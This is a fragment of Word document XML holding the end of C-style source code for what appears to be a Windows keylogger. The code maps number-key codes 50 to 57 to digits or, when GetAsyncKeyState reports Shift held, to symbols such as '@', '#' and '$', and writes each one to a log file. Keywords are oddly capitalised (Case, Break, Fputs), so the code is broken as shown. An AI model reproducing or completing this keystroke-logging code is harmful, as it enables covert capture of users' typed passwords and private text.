        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72765743" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE9BA7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A62851" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B656C50" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF91E71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3C11BCAD" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F801AB5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(“@”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D4DC6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07ED6B5E" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3C9EBC" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A264DE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0478EE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(“2”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A02BF6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0CC34C9E" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5F117B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E6B7B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE38AF" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 51:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3153BD" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B663C0B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1C1A6FA7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A24AC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(“#”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9DAD80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0E161199" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FADC510" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486DF6A4" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9BC6C6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(“3”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C256190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611C9DAA" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D9601F" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49452D" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EFA6DD" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 52:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E14C1E" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263200F4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675B5340" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3595AA73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(“$”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B8BC58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4F1E4925" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8EDBA" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4D7E2" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550AAE60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(“4”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D07856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79A53E73" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5359BF5B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350EF062" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1928AFC7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 53:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EC2668" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A37B4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1F87B8A7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3A45A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(“%”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084E7B0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15B9205C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B1F98" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D97F091" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4EF86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(“5”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7795C377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477899A0" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA7074" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA91078" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E9AEE0" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 54:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E694B4" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE38241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0F08A852" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E07D0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(“^”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE8EFB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04EFF38D" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F1CD4" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE191C2" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1A7C7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(“6”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AE5124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716B8F5E" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4667F951" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD46F1F" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B7B1CE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 55:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D18DC" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381F6E7D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28DE7E97" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB1DC6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(“&amp;”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A23A9B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17AF0196" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC9097" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA3B411" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123FC765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(“7”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D131A7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7B6AA3D7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C5695" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32661F" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0784A4DB" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 56:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B52720" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAAA7A0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23ED9D63" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBA6F8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(“*”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53016749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77E44AA3" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10375E" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528D70E" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACF1FFB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(“8”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270ACF9B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64CB24AE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B09F7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA3201" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED3212" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 57:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A6B0FC" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE08238" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                If(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F093E8" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226704E6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(“(“,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6533A852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09CD378C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D89C99" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC6FE7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DADFC" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fputs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“9”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E877D0" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C49232F" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD77387" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3077D763" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008EC68A" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006339E2" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    }    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B04AD9" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                }        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B345190" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">            }    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129F6E1" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F0C910" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5"/>
    <w:p w14:paraId="6D5E54E9" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    }                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC5046" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00932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E5"/>
    <w:rsid w:val="00932AE5"/>
    <w:rsid w:val="00B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684FF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0CD71198-E3F7-C946-9B00-E1CF42C9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Manickam M</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Muthu Manickam M</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T14:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-11T14:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>